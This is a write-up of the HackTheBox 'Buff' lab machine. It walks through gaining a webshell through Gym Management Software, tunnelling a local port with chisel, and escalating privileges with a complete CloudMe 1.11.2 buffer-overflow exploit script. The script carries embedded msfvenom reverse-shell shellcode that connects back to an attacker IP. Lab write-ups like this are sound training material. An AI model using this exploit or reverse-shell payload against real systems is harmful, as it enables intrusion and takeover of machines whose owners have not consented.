Home HackTheBox - Buff
Post
Cancel

HackTheBox - Buff

Buff is a very nice OSCP style box, where I have to identify the web software running on the site, and exploit it using public exploits to get execution via webshell. For privesc, I’ll find another service I can exploit using public exploits. I’m going to build with my own shell code to create my own shell, and set up the service so that I can connect just by listening on localhost. From there, the exploit script returns an administrator’s shell. In Beyond Root, I’ll go through the first script and do the exploit manually, and see how Defender blocks some of my attempts

Enumeration

nmap scan

1
2
3
4
5
6
7
8
9
10
11
$ nmap -min-rate 5000 --max-retries 1 -sV -sC -p- -oN Buff-full-port-scan.txt 10.10.10.198
Nmap scan report for 10.10.10.198
Host is up (0.18s latency).
Not shown: 65533 filtered ports
PORT     STATE SERVICE    VERSION
7680/tcp open  pando-pub?
8080/tcp open  http       Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n's Bro Hut

Port 8080 (HTTP)

Desktop View

Visiting port 8080 shows us a web page about fitness.

Desktop View

The /contact.php page discloses that Gym Management Software is being used.

Desktop View

Using searchsploit we identified a potential exploit.

Foothold

The exploit mimics a shell and allows us to send remote command.

Desktop View

We can upgrade our shell to a more stable shell by uploading nc.exe and executing it:

1
2
3
4
5
6
$ locate nc.exe
/opt/SecLists/Web-Shells/FuzzDB/nc.exe
/usr/share/seclists/Web-Shells/FuzzDB/nc.exe
/usr/share/sqlninja/apps/nc.exe
/usr/share/windows-resources/binaries/nc.exe
$ cp /usr/share/windows-resources/binaries/nc.exe .

Desktop View

Desktop View

Privesc

Using winPEAS we can see that there is an app called CloudMe which is running on local port 8888 but is not running on remote port.

Desktop View

Plus, if we look at C:\Users\shaun\Downloads\, we can find a binary file called CloudMe_1112.exe:

1
2
3
4
5
6
7
8
9
10
PS C:\Users\shaun\Downloads> dir
dir


    Directory: C:\Users\shaun\Downloads


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----       16/06/2020     16:26       17830824 CloudMe_1112.exe  

In order to transfer it to our local machine, we can take advantage of the current web server:

C:\Users\shaun\Downloads>copy CloudMe_1112.exe C:\xampp\htdocs\gym\                                                                                 
copy CloudMe_1112.exe C:\xampp\htdocs\gym\
        1 file(s) copied.

Note: following Stack-Based Buffer Overflows on Windows x86 course on Academy will guide you on writing an exploit for this program.

Port forwarding with chisel

CloudMe is listening only on localhost.

If we want to make this port available to our machine, we can use a SOCKS proxy such as Chisel. Go to the release page and download the last executables for windows and linux amd64.

  • First, on our Kali machine, we have to set up the Chisel server, listening on any port (here 9999):

    1
    2
    3
    4
    
      $ /chisel_1.7.6_linux_amd64 server -p 9999 --reverse
      2021/09/07 00:09:35 server: Reverse tunnelling enabled
      2021/09/07 00:09:35 server: Fingerprint EFwUZIpNMK9gCrrI3aubBlSlDShKhEzk0ophq0C08S4=
      2021/09/07 00:09:35 server: Listening on http://0.0.0.0:9999
    
  • Then, on the target machine, tunel the port 8888 to our machine:

      C:\>.\chisel.exe client 10.10.14.12:9999 R:8888:127.0.0.1:8888
      .\chisel.exe client 10.10.14.12:9999 R:8888:127.0.0.1:8888
      2021/09/06 23:17:24 client: Connecting to ws://10.10.14.12:9999
      2021/09/06 23:17:26 client: Connected (Latency 188.0315ms)
    

Exploitation

Looking for CloudMe with searchsploit, we can find multiple exploits:

Desktop View

The first one will worked just fine but we have to replace the shellcode. msfvenom can help us to do that:

1
$ msfvenom -p windows/shell_reverse_tcp LHOST=$(vpnip) LPORT=4444 EXITFUNC=thread -b "\x00\x0d\x0a" -f python --var-name payload

Then we can edit the exploit source file as follows:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
# Date: 2020-04-27
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 10 x86

#Instructions:
# Start the CloudMe service and run the script.

import socket
import sys

target = "127.0.0.1"

padding1   = b"\x90" * 1052
EIP        = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET
NOPS       = b"\x90" * 30

# msfvenom -p windows/shell_reverse_tcp LHOST=$(vpnip) LPORT=4444 EXITFUNC=thread -b "\x00\x0d\x0a" -f python --var-name payload
payload =  b""
payload += b"\xb8\x45\x01\x16\x38\xd9\xed\xd9\x74\x24\xf4\x5f"
payload += b"\x33\xc9\xb1\x52\x83\xef\xfc\x31\x47\x0e\x03\x02"
payload += b"\x0f\xf4\xcd\x70\xe7\x7a\x2d\x88\xf8\x1a\xa7\x6d"
payload += b"\xc9\x1a\xd3\xe6\x7a\xab\x97\xaa\x76\x40\xf5\x5e"
payload += b"\x0c\x24\xd2\x51\xa5\x83\x04\x5c\x36\xbf\x75\xff"
payload += b"\xb4\xc2\xa9\xdf\x85\x0c\xbc\x1e\xc1\x71\x4d\x72"
payload += b"\x9a\xfe\xe0\x62\xaf\x4b\x39\x09\xe3\x5a\x39\xee"
payload += b"\xb4\x5d\x68\xa1\xcf\x07\xaa\x40\x03\x3c\xe3\x5a"
payload += b"\x40\x79\xbd\xd1\xb2\xf5\x3c\x33\x8b\xf6\x93\x7a"
payload += b"\x23\x05\xed\xbb\x84\xf6\x98\xb5\xf6\x8b\x9a\x02"
payload += b"\x84\x57\x2e\x90\x2e\x13\x88\x7c\xce\xf0\x4f\xf7"
payload += b"\xdc\xbd\x04\x5f\xc1\x40\xc8\xd4\xfd\xc9\xef\x3a"
payload += b"\x74\x89\xcb\x9e\xdc\x49\x75\x87\xb8\x3c\x8a\xd7"
payload += b"\x62\xe0\x2e\x9c\x8f\xf5\x42\xff\xc7\x3a\x6f\xff"
payload += b"\x17\x55\xf8\x8c\x25\xfa\x52\x1a\x06\x73\x7d\xdd"
payload += b"\x69\xae\x39\x71\x94\x51\x3a\x58\x53\x05\x6a\xf2"
payload += b"\x72\x26\xe1\x02\x7a\xf3\xa6\x52\xd4\xac\x06\x02"
payload += b"\x94\x1c\xef\x48\x1b\x42\x0f\x73\xf1\xeb\xba\x8e"
payload += b"\x92\x19\x31\x9e\x6e\x76\x47\x9e\x7f\xda\xce\x78"
payload += b"\x15\xf2\x86\xd3\x82\x6b\x83\xaf\x33\x73\x19\xca"
payload += b"\x74\xff\xae\x2b\x3a\x08\xda\x3f\xab\xf8\x91\x1d"
payload += b"\x7a\x06\x0c\x09\xe0\x95\xcb\xc9\x6f\x86\x43\x9e"
payload += b"\x38\x78\x9a\x4a\xd5\x23\x34\x68\x24\xb5\x7f\x28"
payload += b"\xf3\x06\x81\xb1\x76\x32\xa5\xa1\x4e\xbb\xe1\x95"
payload += b"\x1e\xea\xbf\x43\xd9\x44\x0e\x3d\xb3\x3b\xd8\xa9"
payload += b"\x42\x70\xdb\xaf\x4a\x5d\xad\x4f\xfa\x08\xe8\x70"
payload += b"\x33\xdd\xfc\x09\x29\x7d\x02\xc0\xe9\x9d\xe1\xc0"
payload += b"\x07\x36\xbc\x81\xa5\x5b\x3f\x7c\xe9\x65\xbc\x74"
payload += b"\x92\x91\xdc\xfd\x97\xde\x5a\xee\xe5\x4f\x0f\x10"
payload += b"\x59\x6f\x1a"

overrun    = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))	

buf = padding1 + EIP + NOPS + payload + overrun 

try:
	s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((target,8888))
	s.send(buf)
except Exception as e:
	print(sys.exc_value)

We forwarded the port 8888 of the target on ou port 8888, now we just have to run the exploit:

Desktop View


This post is licensed under 0x3n0 by the author.

HackTheBox - ServMon

HackTheBox - Grandpa